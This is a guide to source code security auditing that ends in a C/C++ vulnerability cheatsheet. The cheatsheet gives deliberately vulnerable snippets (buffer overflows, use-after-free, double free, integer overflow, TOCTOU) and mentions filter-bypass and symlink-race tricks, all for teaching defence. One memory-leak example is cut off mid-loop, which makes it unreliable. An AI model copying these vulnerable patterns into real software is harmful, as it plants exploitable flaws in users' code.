Comprehensive Guide to Source Code Auditing
Part I: Introduction to Software Security Assessment
Introduction & Core Concepts
Preface
Software, though often perceived as inscrutable, deeply impacts daily life, raising questions about the security of systems we rely on. Software vulnerabilities are essentially weaknesses or bugs that attackers can exploit. Understanding these vulnerabilities involves looking past the apparent complexity to see how they work. Every software system operates under a security policy, which might be formally documented or exist as informal user expectations about reasonable system behavior. Vulnerabilities represent deviations from this policy that can be leveraged for attacks.
Security Expectations
Software security is often discussed based on three core components:
- Confidentiality: Requires keeping information private and hidden from unauthorized access. This applies to various sensitive data, from national intelligence to personal information.
- Integrity: Refers to the trustworthiness and correctness of data, ensuring it hasn't been altered improperly. It also relates to the authenticity of the data's source. Software maintains integrity by preventing unauthorized changes or detecting alterations.
- Availability: Ensures that information and resources are accessible and usable when needed. This involves resilience against denial-of-service (DoS) attacks.
Classifying Vulnerabilities
Vulnerabilities can be grouped into classes based on common patterns or concepts. This classification helps in understanding and communication, though a single flaw might fit into multiple classes.
- Design Vulnerabilities: Problems stemming from fundamental mistakes in the software's design or architecture. The software works as designed, but the design itself is insecure, often due to flawed assumptions about the environment or risks. Also known as high-level or architectural flaws.
- Implementation Vulnerabilities: Issues arising from how the design is coded. These occur during development, often due to deviations from the design or specific nuances of the platform or language used. Also called low-level or technical flaws.
- Operational Vulnerabilities: Security problems related to the software's configuration, deployment environment, or operational procedures, rather than the source code itself. Includes issues with configuration, supporting systems, and surrounding processes.
Common Threads
Recurring themes often underlie software vulnerabilities:
- Input and Data Flow: The majority of flaws arise from how a program responds to unexpected or malicious data inputs.
- Trust Relationships: Different software components trust each other to varying degrees, affecting the level of validation applied to exchanged data. Understanding these is key.
- Assumptions and Misplaced Trust: Developers might make incorrect assumptions about input data validity, environmental security, user capabilities, or API behavior, leading to vulnerabilities.
- Attack Vectors: Common entry points for attacks include user input, interfaces (APIs, network sockets), environmental factors (configuration files, system settings), and how exceptional conditions are handled.
Software Design Fundamentals
Algorithms and Problem Domain Logic
Software engineering involves developing and implementing algorithms. The design must specify key algorithms, data structures, and the rules (problem domain logic or business logic) the program follows. Security expectations for users and resources are a crucial part of this logic. Algorithm choices driven by performance needs should also be assessed for security implications.
Abstraction and Decomposition
Essential concepts for managing complexity:
- Abstraction: Reducing complexity by isolating important elements and hiding unnecessary details. Used to model processes and create hierarchies.
- Decomposition: Defining the generalizations and classifications within an abstraction. Can be top-down (specialization) or bottom-up (generalization).
Principles of Software Design
- Coupling: The level of communication and interdependence between modules. Loosely coupled modules interact via well-defined interfaces, which is generally better for security and maintainability, especially across trust boundaries. Strongly coupled modules have complex dependencies, expose internal details, often trust each other highly, and perform less data validation, making them prone to flaws if one component is compromised. Look for strong coupling across trust boundaries.
- Cohesion: A module's internal consistency and focus on related activities. Strong cohesion is desirable. Security issues can arise if a module handles multiple trust domains without proper decomposition, similar to coupling issues but occurring within a single module.
Fundamental Design Flaws & Policy Enforcement
Fundamental Design Flaws Examples
- Exploiting Strong Coupling: Communication channels designed for one context might insecurely couple different trust domains in another (e.g., Windows message queue allowing messages between processes of different privilege levels on the same desktop). Security needs to be considered when designs evolve or environments change.
- Exploiting Transitive Trusts: Attackers can manipulate trust between components. Accessing a public interface of one component might grant trusted access to another, more sensitive component if they share an implicit trust (e.g., running under the same user account). Lenient input validation based on assumed trust can exacerbate this (e.g., Solaris automountd vulnerability).
- Failure Handling: Balancing usability and security during error handling is crucial. Usability might favor detailed error messages and recovery attempts, but security often dictates terminating sessions and providing minimal feedback to avoid aiding attackers who intentionally trigger errors. Security requirements may need to supersede usability in these cases.
Enforcing Security Policy
Key mechanisms for enforcing security:
- Authentication: Verifying the identity of a user or system.
- Authorization: Determining permissions for an authenticated entity.
- Accountability: Logging actions to trace activity and ensure nonrepudiation. Crucial for post-incident analysis but often overlooked.
- Confidentiality: Ensuring data is viewed only by authorized parties, using access control and encryption.
- Availability: Ensuring resources are accessible when needed, protecting against DoS.
Threat Modeling & Operational Review
Threat Modeling
A structured process to identify potential threats:
- Information Collection: Gather all available information.
- Identify Assets, Entry Points, External Entities, Trust Levels, Major Components, Use Scenarios.
- Sources: Standard documentation (RFCs), Source Profiling (reviewing code structure, entry points), System Profiling (file layout, dependencies, imports/exports, sandboxing, network sniffing, scanning).
- Application Architecture Modeling: Understand the application structure and component interactions using models like DFDs. Review existing documentation or create new models.
- Threat Identification: Use techniques like Attack Trees to map potential attack paths. The tree root is the goal, branches are steps. Document potential mitigations for identified threats.
- Documentation of Findings: Summarize identified threats and provide remediation recommendations.
Operational Review
Analyzing security aspects of deployment and configuration:
- Exposure: Consider the deployment environment's impact (OS, network profile).
- Insecure Defaults: Preconfigured settings that pose risks (e.g., no wireless encryption, default passwords) often chosen for ease of use. Review application defaults and installation options (passwords, secure communication modes, access control).
- Access Control: How the application utilizes host OS or internal access control features.
- Unnecessary Services: Enabled functionality not required for operation increases the attack surface. Often results from insecure defaults or including unneeded features.
- Secure Channels: Ensuring communication confidentiality (e.g., encryption over networks, proper access control on local channels like named pipes).
- Spoofing and Identification: Weaknesses allowing impersonation; deployment might introduce risks not addressed by the application design alone.
- Network Profiles: Different protocols have different risk levels depending on network location (e.g., NFS/SMB inside vs. outside a firewall). Developers need to choose sensible defaults and document security concerns for various deployment scenarios.
Protective Measures
Defense-in-depth mechanisms applied during or after development:
- Development Time: Secure coding practices, safer languages/libraries.
- Host-Based: OS hardening, security software (AV, HIDS), memory protections (ASLR, Stack/Heap Protection, Non-executable Memory), sanitizers.
- Network-Based: Firewalls, IDS/IPS.
- Note: These measures exist outside the core application code but affect overall security; they can also introduce their own vulnerabilities.
The Application Review Process
Rationale & Process Outline
Rationale
Effective code review requires a pragmatic, flexible, results-driven approach. It's a creative process requiring understanding developer intent and hypothesizing unexpected behaviors, making it a skill developed over time. A rigid, step-by-step methodology is unrealistic, but a structured process enhances effectiveness, consistency, and manageability.
Process Outline
A flexible four-phase process:
- Preassessment: Planning, scoping the review, collecting initial information.
- Application Review: The core assessment phase, iteratively applying various strategies to cover design, logic, implementation, and operational aspects simultaneously.
- Documentation and Analysis: Collecting, documenting findings, conducting risk analysis, suggesting remediation.
- Remediation Support: Assisting developers with fixes and verification.
Preassessment & Review Strategy
Preassessment Details
- Scoping: Define the goal clearly (e.g., find biggest flaws fast vs. comprehensive coverage within budget/time).
- Application Access: The type of access dictates methodology:
- Source only: Static analysis focus.
- Binary only: Reverse engineering, dynamic analysis focus.
- Source and binary: Most efficient, combines static and dynamic.
- Checked build: Binary with debug info, aids analysis.
- Strict black box: Only external testing (fuzzing).
- Information Collection: Gather details via developer interviews, documentation, standards, source profiling, system profiling.
Application Review Strategy
An iterative approach is often best, as understanding deepens over time. Avoid rigid waterfall-style reviews where design review happens only at the start when knowledge is lowest.
- Avoid Drowning: Switch between different techniques periodically to maintain focus and motivation, and cover different vulnerability types. Recognize that intense concentration is limited.
- Iterative Process: Repeat a cycle of Plan -> Work -> Reflect.
- Plan: Decide the next target/goal or auditing strategy for a manageable work block (2-8 hours). Examples: Identify entry points, list uses of unsafe functions, trace a complex path.
- Work: Execute the strategy, taking extensive notes. Maintain a master list of ideas/potential issues.
- Reflect: Check progress, focus, time management. Ask: What learned? Focusing correctly? Sidetracked? Notes adequate? Models accurate? Re-evaluate the plan if needed, but don't mistake lack of findings for a flawed plan immediately. Take breaks as needed, either by switching tasks or stepping away completely. Don't fall down rabbit holes; balance depth with coverage and deadlines.
- Initial Preparation: Decide on review structure:
- Top-Down: Start from design/threat model, refine by assessing implementation along key paths. Good if docs are accurate, risky otherwise.
- Bottom-Up: Start from implementation details, build understanding upwards. Thorough but potentially slow. Maintain a design model as you go.
- Hybrid: Combine approaches, often best when design docs are lacking. Start by identifying high-level characteristics (purpose, assets, entry points, components, trust boundaries) and refine iteratively.
Code-Auditing Tactics
Code-Auditing Tactics
Techniques to apply during the review:
- Code Navigation: Understand how code flows.
- External Flow Sensitivity: Analyze how execution proceeds between functions, considering control flow (following calls) and data flow (tracking variable use). Often, reviewing functions in isolation (insensitive) is more efficient initially.
- Tracing Direction: Forward tracing (from entry point) evaluates functionality; backward tracing (from candidate point) evaluates reachability. Back-tracing is often faster but relies on good candidate point identification and can miss logic flaws.
- Internal Flow Analysis: Analyze control and data flow within a function. Carefully examine all relevant code paths, including error-checking branches and complex (pathological) paths, as these are often less tested.
- Subsystem and Dependency Analysis: Familiarize yourself with shared components (custom allocators, string handlers, parsers) and standard library functions used, including their potential quirks and side effects.
- Re-Reading Code: Multiple passes over the same code are often necessary to consider different vulnerability classes or fully understand complex logic. Ask detailed questions even about simple-looking code (global variable changes, initialization, return value handling).
- Desk-Checking: Manually trace variables through code with specific input values to understand complex logic or side effects.
- Test Cases: Use specific inputs (manually, via debugger, or with small test programs) to verify behavior, especially at boundaries or with unexpected values.
Code-Auditing Strategies
Code-Auditing Strategies
Methods for approaching the code:
- Code Comprehension (CC): Focus on understanding the code directly.
- CC1: Trace Malicious Input: Follow potentially tainted data from entry points, looking for unsafe operations. Requires experience; can be difficult in complex/OO code.
- CC2: Analyze a Module/File: Read code line-by-line within a file/module, taking notes on potential issues without necessarily tracing every call. Builds deep understanding but is taxing and risks reviewing non-relevant code.
- CC3: Analyze an Algorithm: Focus line-by-line analysis on a specific, security-relevant algorithm (e.g., crypto, security model enforcement, input processing).
- CC4: Analyze a Class/Object: Similar to CC2/CC3 but focused on a class; effective for OO code.
- CC5: Trace Black Box Hits: Investigate crashes or anomalies found via fuzzing/manual testing by tracing the problematic input/scenario in the source code. Requires a working application version.
- Candidate Point (CP): Identify potential issues (candidate points) first, then verify. Faster for common bugs but less comprehensive.
- CP1: General Candidate Point Approach: Identify potentially unsafe constructs (e.g.,
sprintf
use, dynamic SQL) via tools or knowledge, then back-trace to see if reachable with untrusted input. Verification required for each candidate. Relies on assumptions about what constitutes a vulnerability. - CP2: Automated Source Analysis Tools (SAST): Use tools to find candidate points based on known patterns. Can cover large codebases but suffer from false positives, high cost/effort, and inability to find novel or complex logic/design flaws. Technology is improving but best used to augment manual review.
- CP3: Simple Lexical Candidate Points: Use text search (
grep
,findstr
) for specific vulnerable patterns (e.g.,printf
with non-static format string,strcpy
,../
). Filter list based on context (e.g., handles user input?) then verify using CP1. - CP4: Simple Binary Candidate Points: Search compiled binaries for patterns when source is unavailable (e.g., specific instructions like
movsx
for sign extension issues, or string literals corresponding to vulnerable functions). Verify as with CP3.
- CP1: General Candidate Point Approach: Identify potentially unsafe constructs (e.g.,
- Design Generalization (DG): Infer high-level design/logic from implementation to find flaws. Requires good code understanding.
- Model the System: Build/refine design models based on code analysis.
- Hypothesis Testing: Formulate and test hypotheses about design assumptions or expected behavior based on code.
- Deriving Purpose and Function: Understand what components actually do based on implementation, compare with intended function.
- Design Conformity Check: Compare implementation against documented or inferred design to find discrepancies.
Auditing Tips & Considerations
Auditing Tips & Considerations
- Variable Relationships: Identify variables whose values depend on each other or represent a combined state. Check if code paths exist where these related variables can become desynchronized or inconsistent.
- Structure/Object Mismanagement: In OO code or code using complex structs, understand the purpose of members and interfaces. Look for ways to desynchronize related members or leave objects in unexpected states.
- Initialization: Check if code paths exist where variables might be read before being initialized. Pay attention to cleanup code (epilogues) jumped to from multiple locations and functions assuming variables are initialized elsewhere.
- Arithmetic Boundaries: Follow a structured process:
- Find operations where boundary conditions (overflow/underflow) have security impact (e.g., length calculations, comparisons).
- Determine input values triggering the boundary condition.
- Check if the vulnerable code path is reachable with those values, considering type constraints and validation checks.
- Type Confusion: Be wary of
union
types where the code might misinterpret which member is active, especially confusing pointers and integers or different struct types. Check the logic controlling union interpretation. - Looping Constructs: Focus on data-processing loops. Check for common errors:
- Incorrect terminating conditions (fail to account for buffer sizes, off-by-one errors). Audit Tip: When loops copy data without size validation, check if source can be larger than destination. Audit Tip: Mark exit conditions and manipulated variables; check for inconsistent states, especially on error exits.
- Using post-test (
do...while
) when pre-test (while
,for
) is needed, potentially executing the loop body once incorrectly. - Missing/misplaced
break
orcontinue
statements. - Punctuation errors changing loop behavior.
- Flow Transfer Statements: Misuse of
break
(e.g., breaking from wrong nested structure likeif
insideswitch
),continue
,goto
can lead to unexpected control flow. Checkswitch
statements for missingbreak
s (fallthrough) and missingdefault
cases. - Function Calls: Analyze calls for:
- Misinterpreted/ignored return values (status/error codes, resulting values).
- Incorrectly formatted arguments (type mismatches, wrong intended meaning). Audit Tip: List argument types/meanings, check callers for type conversions (especially sign changes, sign extensions) or incorrect arguments.
- Unexpected updates to arguments passed by reference (side effects). Audit Tip: Note functions altering pass-by-reference arguments or global state; check if callers account for this (e.g., pointers updated after
realloc
). - Unexpected global state changes.
- Function Audit Logs: Maintain notes on function purpose, arguments, return values, side effects, potential issues to aid analysis.
- Memory Management Auditing:
- ACC Logs: Use Allocation-Check-Copy logs to track buffer allocation size formulas, size checks applied to data, and copy operations performed on the buffer to spot discrepancies.
- Data Assumptions: Be skeptical of assumptions about the format/content of binary data, especially proprietary formats; they can be reverse-engineered and manipulated.
- Allocation Functions: Understand custom allocator behavior; don't assume they are robust. Check handling of edge cases (e.g., zero-size allocation).
- String Handling:
- Character Expansion: Check code encoding special characters; ensure destination buffers are large enough for the expanded string.
- Metacharacters: Understand how metadata is embedded (in-band) vs. stored separately (out-of-band). In-band metacharacters (like NUL terminators, path separators
/
, hostname separators.
, SQL quotes'
) create implicit trust boundaries that parsing routines must handle correctly. Scrutinize code constructing strings from user input (filenames, SQL queries, email addresses, registry paths) for improper sanitization leading to injection attacks. - Auditing Tip: Code using
snprintf
often combines user data with static data; check for potential embedded delimiters or truncation of static parts if user data is too long. - Auditing Tip: For format strings, search
printf
/syslog
/err
families for non-static format string arguments; trace back to user control. Check wrappers passing varargs too. - Auditing Tip: When auditing multicharacter filters (e.g., for
../
), check for bypasses using embedded patterns (e.g.,....//
) or incomplete substitution (e.g.,s/\.\.\///g
in Perl/PHP).
- File System Issues (UNIX focus):
- Auditing Tip:
access()
usually indicates a TOCTOU race condition;stat()
has similar issues when used on filenames. - Auditing Tip: If you find a file descriptor duplication vulnerability, use tools like
lsof
in a similar environment to see what sensitive FDs might be accessible. - stat() Family: Understand
stat
(follows links),lstat
(doesn't follow links),fstat
(operates on FD, safest re: races). Know the macros for checking file types (S_ISREG, S_ISDIR, S_ISLNK, etc.). - Evading Access Checks: Look for pattern: check function on filename (stat, access) followed by action function on filename (open, chmod, unlink). Safe pattern uses checks/actions on file descriptors (fstat, fchmod after open).
- Auditing Tip:
Documenting Findings & Auditor Toolbox
Documenting Findings
Provide clear and actionable information for each finding:
- Location: File, function, line number(s).
- Vulnerability Class: Type (e.g., buffer overflow, integer overflow).
- Description: Explanation of the issue.
- Prerequisites: Conditions required to trigger.
- Business Impact: How it affects the organization/users.
- Remediation: Suggestions for fixing the flaw.
- Risk Rating: Overall risk (e.g., using DREAD: Damage, Reproducibility, Exploitability, Affected Users, Discoverability) incorporating severity and probability.
- Severity: Potential damage if exploited.
- Probability: Likelihood of successful exploitation.
- Overall Summary: Conclude with a general assessment of the application's security posture and observed trends.
Code-Auditor Toolbox
Essential tools for auditors:
- Source Code Navigators: Features: Cross-referencing (definitions/uses), text searching, multi-language support, syntax highlighting, graphing (call trees), scripting. Examples: ctags, cscope, IDEs, Source Insight.
- Debuggers: Features: Kernel debugging, memory searching, scripting, debug symbol support, conditional breakpoints, thread support, on-the-fly assembling, remote debugging. Examples: gdb, WinDbg, OllyDbg, IDA Pro debugger.
- Disassemblers/Decompilers: IDA Pro, Ghidra, Binary Ninja.
- Fuzz-Testing Tools: SPIKE framework, AFL, libFuzzer, Peach Fuzzer.
- Automated Code Auditing (SAST): Tools vary widely in capability and cost. Examples: SonarQube, Checkmarx, Fortify SCA.
- Text Search Utilities:
grep
,findstr
.
Part II: Software Vulnerabilities
C/C++ Vulnerabilities Cheatsheet & Details
C/C++ Vulnerabilities Cheatsheet & Details
1. Memory Corruption Vulnerabilities
- 1.1 Stack Buffer Overflow
- Description: Writing past the allocated boundary of a fixed-size buffer on the stack. Can overwrite return addresses, saved frame pointers, or local variables. Often caused by unsafe functions like
strcpy
,sprintf
,gets
, orscanf
without bounds checking. - Example:
void vulnerable_function(char *input) { char buffer[10]; // scanf("%s", buffer); // Original cheatsheet example uses scanf strcpy(buffer, input); // Stack_BoF.md example uses strcpy printf("Buffer contents: %s\n", buffer); }
- Algorithm:
type VARIABLE[SIZE] VARIABLE = (VALUE > SIZE)
- SEH Overwrite (Windows Specific): Stack overflows can overwrite Structured Exception Handling (SEH) records, allowing control flow hijack when an exception occurs.
- Description: Writing past the allocated boundary of a fixed-size buffer on the stack. Can overwrite return addresses, saved frame pointers, or local variables. Often caused by unsafe functions like
- 1.2 Heap Buffer Overflow
- Description: Writing past the allocated boundary of a buffer dynamically allocated on the heap (via
malloc
,calloc
,new
). Can overwrite heap metadata (chunk headers) or adjacent allocated objects. Caused by unsafe copy functions without bounds checks on heap buffers. - Example:
void vulnerable_function(char *input) { char *buffer = (char *)malloc(10); // Allocate 10 bytes on the heap // scanf("%s", buffer); // Original cheatsheet example uses scanf strcpy(buffer, input); // Heap_BoF.md example uses strcpy printf("Buffer contents: %s\n", buffer); free(buffer); }
- Algorithm:
type *VARIABLE = malloc[SIZE] *VARIABLE = (VALUE > SIZE)
- Description: Writing past the allocated boundary of a buffer dynamically allocated on the heap (via
- 1.3 Off-by-one errors
- Description: A specific type of bounds error where exactly one byte or element is written past the end of a buffer. Often caused by using
<=
instead of<
in loop conditions comparing against buffer size, or forgetting space for a null terminator. - Example:
void process_string(char *src) { char dest[32]; int i; // Assuming i is declared // Condition allows writing to dest[32] which is out of bounds for (i = 0; src[i] && (i <= sizeof(dest)); i++) { dest[i] = src[i]; } // Potential fix: ensure null termination if loop completes // if (i < sizeof(dest)) dest[i] = '\0'; }
- Algorithm:
type VARIABLE[SIZE] condition: if counter <= sizeof(VARIABLE) then write // Should be <
- Description: A specific type of bounds error where exactly one byte or element is written past the end of a buffer. Often caused by using
- 1.4 Memory Leaks
- Description: Allocating memory (e.g.,
malloc
,new
) but failing to release it (free
,delete
) when no longer needed. Consumes available memory, potentially slowing or crashing the system. Primarily an availability issue. - Example:
int main(int argc, char **argv) { int count = 0; int LOOPS = 10; int MAXSIZE = 256; char *pointer = NULL; for(count=0; count
- Algorithm:
loop { type VARIABLE = malloc(sizeof(type)) } // VARIABLE only points to last allocation, previous are lost free VARIABLE // Only frees last
- Description: Allocating memory (e.g.,
- 1.5 Use-After-Free
- Description: Accessing a memory location after it has been freed. Can lead to crashes, data corruption, or code execution if the memory is reused by the allocator for different data/objects. Common causes: error conditions freeing memory early, confusion over ownership/freeing responsibility.
- Example:
// Cheatsheet example variation char* ptr = (char*)malloc (SIZE); int abrt = 0; // Added for example clarity if (err) { // Assume 'err' is some error condition abrt = 1; free(ptr); } // ... later ... if (abrt) { // UAF: ptr used after potential free logError("operation aborted before commit", ptr); } // README.md example (conceptual, focuses on heap layout interaction) // buf1R1 = malloc(512); // buf2R1 = malloc(512); // free(buf2R1); // buf2R2 = malloc(248); // Might reuse part of freed buf2R1 // buf3R2 = malloc(248); // Might reuse other part // strncpy(buf2R1, argv[1], 511); // UAF: Write to freed buf2R1, potentially corrupting buf2R2/buf3R2 metadata or content.
- Algorithm:
type VARIABLE = malloc(sizeof(TYPE)) free VARIABLE // ... later usage ... use VARIABLE
- 1.6 Double-Free
- Description: Calling
free
(ordelete
) more than once on the same pointer. Can corrupt heap metadata, potentially allowing write-what-where primitives. Modern allocators often detect simple double frees, but complex scenarios or custom allocators might still be vulnerable. Also possible viarealloc(ptr, 0)
on some systems. Be mindful in C++ destructors or complex error handling paths. - Example:
char* ptr = (char*)malloc (SIZE); int abrt = 0; // Added for clarity // ... some operations ... if (abrt) { free(ptr); } // ... more operations ... // Double free if abrt was true free(ptr);
- Algorithm:
type VARIABLE = malloc(sizeof(TYPE)) free VARIABLE ... free VARIABLE
- Description: Calling
- 1.7 Out-Of-Bounds Write
- Description: Writing data past the end or before the beginning of the intended buffer. This is a general case including stack/heap overflows and incorrect array indexing.
- Example:
// OOBW.md example int buffer[5]; int index; printf("Enter an index (0-4): "); scanf("%d", &index); // No bounds check on index buffer[index] = 42; // OOB Write if index < 0 or index >= 5 // Cheatsheet example // int id_sequence[3]; // Valid indices: 0, 1, 2 // id_sequence[3] = 456; // OOB Write
- Algorithm:
type VARIABLE[SIZE] VARIABLE[INDEX] = VALUE // Where INDEX >= SIZE or INDEX < 0
- 1.8 Uninitialized Data Access
- Description: Reading data from a variable or memory location that has not been explicitly initialized. The variable holds residual data from previous memory use, leading to unpredictable behavior or information leakage. Check all code paths, especially error paths, to ensure variables are initialized before use.
- Example:
void vuln_func(int val){ // Example shows passing uninit var, read is implicit printf("Value: %d\n", val); // Reading uninitialized 'i' from main } int main() { int i; // 'i' is uninitialized vuln_func(i); // Pass uninitialized var (C passes by value, but concept applies) // Better example: Reading an uninitialized local variable directly // char buffer[10]; // if (condition) { strcpy(buffer, "init"); } // printf("%s", buffer); // Potential read of uninitialized data if condition false return 0; }
- Algorithm:
type VARIABLE ... // No assignment to VARIABLE func_read(VARIABLE) // use of uninitialized VARIABLE
2. Pointer Manipulation
- 2.1 Null-Pointer Dereference
- Description: Attempting to read from or write to address 0 (NULL). Typically causes a crash (DoS).
- Example:
char *ptr = NULL; // Dereference happens inside the function call if it uses the pointer // function_call(ptr); // Or directly: *ptr = 'a'; // Crash char c = *ptr; // Crash
- Algorithm:
type *VARIABLE = NULL *VARIABLE = ... // or ... = *VARIABLE
- 2.2 Dangling Pointers
- Description: A pointer that references memory that has been freed or is no longer valid (e.g., points to a local variable whose scope has ended). Using it leads to behavior similar to Use-After-Free.
- Example:
char *dp = NULL; { char c = 'x'; dp = &c; } // c goes out of scope, its stack memory can be reused // dp now points to invalid stack memory // *dp = 'y'; // Undefined behavior, potential corruption
- 2.3 Uninitialized Pointers
- Description: Using a pointer variable before it has been assigned a valid memory address. It points to an arbitrary location; dereferencing leads to crashes or unpredictable behavior.
- Example:
int *i; // Uninitialized pointer // Passing address of uninitialized pointer is different, perhaps meant: // int *ptr; // *ptr = 5; // Dereferencing uninitialized pointer -> Crash/Corruption // Cheatsheet example seems flawed, perhaps intended: // vuln_func(i); // Passing the uninitialized pointer itself
- Algorithm:
type *DATA; // Dereference DATA before assignment *DATA = ... // or ... = *DATA
- 2.4 Pointer Arithmetic Issues
- Description: Errors arising from misunderstanding how pointer arithmetic works in C/C++. Operations (+, -) scale by the size of the data type pointed to. Comparing pointers compares addresses. Adding pointers is invalid; subtracting pointers (of same type) yields the element difference (ptrdiff_t). Common bugs involve using byte offsets when element offsets are needed, or
sizeof(pointer)
instead ofsizeof(buffer)
. - Example (Scaling):
short *j; j = (short *)0x1000; // Example address j = j + 1; // j now points to 0x1002 (assuming short is 2 bytes)
- Example (Sizeof misuse):
int buf[1024]; int *b = buf; // Incorrect check: adds byte size to pointer, comparison is scaled // while (havedata() && b < buf + sizeof(buf)) { *b++=val; } // Correct check (usually): compare against end pointer while (havedata() && b < &buf[1024]) { *b++=val; } // Or use index: for(i=0; i<1024; i++) buf[i]=val;
- Auditing Tip: Check arithmetic involving pointers; verify the operation aligns with the implicit scaling based on pointer type. Look for incorrect
sizeof
usage (pointer vs buffer).
- Description: Errors arising from misunderstanding how pointer arithmetic works in C/C++. Operations (+, -) scale by the size of the data type pointed to. Comparing pointers compares addresses. Adding pointers is invalid; subtracting pointers (of same type) yields the element difference (ptrdiff_t). Common bugs involve using byte offsets when element offsets are needed, or
3. Concurrency and Synchronization
- 3.1 Race Conditions
- Description: Outcome depends on the unpredictable sequence or timing of concurrent operations, often involving shared resources accessed without proper locking. Can lead to corrupted data, crashes, or security bypasses.
- Example (Shared Queue without Locks):
// Conceptual - from cheatsheet, simplified struct element *queue = NULL; // Shared resource void enqueue(struct element *new_obj) { // ... find end of queue ... (Needs locking) // tmp->next = new_obj; (Needs locking) } struct element* dequeue() { // if (queue == NULL) ... (Needs locking) // elem = queue; (Needs locking) // queue = queue->next; (Needs locking) // return elem; } // Problem: If dequeue reads 'queue' just before another thread sets it to NULL, // or if two threads dequeue simultaneously, errors occur.
- TOCTOU (Time-of-Check to Time-of-Use): A specific race where a check is performed on a resource, but the resource changes state before it's used. Common with filesystem operations.
- Example:
if (access("file", W_OK) == 0) { fd = open("file", O_WRONLY); }
- Attacker could change "file" (e.g., make it a symlink to /etc/passwd) betweenaccess
andopen
. - Auditing Tip:
access()
/stat()
on filenames are suspect; prefer checks on file descriptors (fstat
) after opening.
- Example:
- Filesystem Races (UNIX):
- Permission Races: File created with weak permissions, then fixed; attacker opens during the window.
- Ownership Races: File created by non-priv user, then
chown
ed to priv user; attacker acts during window. - Directory Races: Attacker manipulates directory structure (e.g., replaces dir with symlink) while privileged process traverses it.
- 3.2 Starvation and Deadlocks
- Description:
- Starvation: A thread is perpetually denied access to necessary resources.
- Deadlock: Two or more threads block each other indefinitely, each waiting for a resource held by another. Requires: Mutual Exclusion, Hold and Wait, No Preemption, Circular Wait. Can also occur if locks aren't released due to errors.
- Example (Deadlock - Incorrect Lock Ordering):
// mutex1, mutex2 are shared locks void thread1() { lock(mutex1); // ... lock(mutex2); // Might block if thread2 holds mutex2 // ... unlock(mutex2); unlock(mutex1); } void thread2() { lock(mutex2); // ... lock(mutex1); // Might block if thread1 holds mutex1 // ... unlock(mutex1); // Note: Cheatsheet had unlock(mutex2) here, likely typo unlock(mutex2); } // Deadlock if thread1 locks mutex1, thread2 locks mutex2, then both try to lock the other.
- Description:
- 3.3 Inadequate Locking
- Description: Failing to acquire necessary locks, holding locks for too short a duration, or using the wrong type of lock when accessing shared resources, allowing race conditions.
- Example:
// Conceptual - based on cheatsheet example description pthread_mutex_t mutex; void *thread_func(void *arg) { // Lock should cover all accesses to shared data, not just part. // If shared_data is accessed before lock or after unlock, it's inadequate. pthread_mutex_lock(&mutex); // access_shared_data_part1(); pthread_mutex_unlock(&mutex); // Released too early? // access_shared_data_part2(); // Unprotected access return NULL; }
- 3.4 Re-entrancy
- Description: A function is non-reentrant if it cannot be safely interrupted and called again (by another thread or signal handler) before the first call completes. Often due to reliance on shared state (global/static variables) without proper locking or use of non-reentrant library functions.
- Example:
// Cheatsheet example conceptual double account_balance = 1000.0; // Shared state void process_transaction(double amount) { // Non-reentrant section if called concurrently without locks double current_balance = account_balance; // Interruption here by another thread calling process_transaction // could lead to incorrect final balance. current_balance += amount; // Simulate work account_balance = current_balance; }
4. Arithmetic Boundary Vulnerabilities
- 4.1 Unsigned Integer Boundaries (Wrap Around)
- Description: Unsigned integers wrap around on overflow (large value becomes small) or underflow (small value becomes large). Exploitable if used in size calculations where overflow leads to small allocation followed by large copy, or in security checks.
- Example (Allocation Size Overflow):
// From Art of VR description unsigned int width = 0x400, height = 0x1000001; unsigned int n = width * height; // n overflows to 0x400 (1024) char *buf = (char *)malloc(n); // Allocates only 1024 bytes for (int i=0; i < height; i++) // Loop runs height times (>> 1024) memcpy(&buf[i*width], init_row, width); // Massive heap overflow
- Example (Multiplication Overflow before Allocation):
// From Art of VR description (SSH exploit) u_int nresp = 0x40000020; // Large number from packet // nresp * sizeof(char*) = 0x40000020 * 4 = 0x100000080 // Overflows to 0x80 (128) on 32-bit system response = xmalloc(nresp * sizeof(char*)); // Allocates only 128 bytes for (i = 0; i < nresp; i++) // Loop runs 0x40000020 times response[i] = packet_get_string(NULL); // Massive heap overflow
- 4.2 Signed Integer Boundaries (Overflow/Underflow)
- Description: Signed integer overflow/underflow behavior is technically undefined in C/C++, but often wraps around (implementation-defined). Can be exploited to bypass security checks, especially those comparing against maximum size limits. Adding 1 to MAX_INT can result in MIN_INT (negative).
- Example (Bypassing Length Check):
// From Art of VR description #define MAXCHARS 1024 int length = 0x7FFFFFFF; // Max signed int // Check 1: length < 0 -> false // Check 2: length + 1 >= MAXCHARS // length + 1 = 0x7FFFFFFF + 1 = 0x80000000 (MIN_INT, negative) // negative >= MAXCHARS -> false // Check bypassed! if(length < 0 || length + 1 >= MAXCHARS) { /* error */ } // read(sockfd, buf, length); // read called with huge positive length
5. Type Conversion Vulnerabilities
- 5.1 Signed/Unsigned Conversion Issues
- Description: Implicit conversions between signed and unsigned types, often during comparisons or assignments. Passing negative signed integers to functions expecting unsigned sizes (
size_t
) results in large positive values. Comparisons between signed and unsigned types usually promote the signed operand to unsigned, potentially bypassing checks. - Rule: If operands include float, convert to float. Otherwise, perform integer promotions (char/short -> int). If types still differ, convert operand with lower rank to type of higher rank; if ranks equal and one is unsigned, convert signed to unsigned.
- Example (Comparison Promotion):
int jim = -5; // sizeof(int) is unsigned size_t, has higher rank than signed int. // jim is converted to unsigned before comparison. if (jim < sizeof(int)) // Comparison is effectively (unsigned)-5 < 4 do_something(); // This will likely NOT be called.
- Auditing Tip: Look for signed integers passed to functions expecting
size_t
(read, memcpy, malloc, strncpy etc.). Check comparisons involving mixed signed/unsigned types, especially withsizeof
orstrlen
results.
- Description: Implicit conversions between signed and unsigned types, often during comparisons or assignments. Passing negative signed integers to functions expecting unsigned sizes (
- 5.2 Sign Extension
- Description: Converting a smaller signed type (char, short) to a larger signed type (int, long) copies the sign bit into the new higher-order bits. A negative char (-1, 0xFF) becomes a negative int (-1, 0xFFFFFFFF). Can cause issues if the extended value is used in calculations or passed to functions expecting unsigned values.
- Example (Passed to snprintf):
char len = -1; // Value 0xFF from network maybe // len promoted to int 0xFFFFFFFF (-1) snprintf(dst, len, "%s", src); // snprintf receives negative size
- Example (DNS Packet Parsing):
// Conceptual from Art of VR BIND example char count = (char)*indx; // Read signed char length byte // If count is negative (e.g., -1 / 0xFF), sign extension occurs when used // in contexts expecting int. // strncat(nameStr, (char *)indx, count); // count promoted to int -1 // If strncat interprets negative size as very large -> overflow
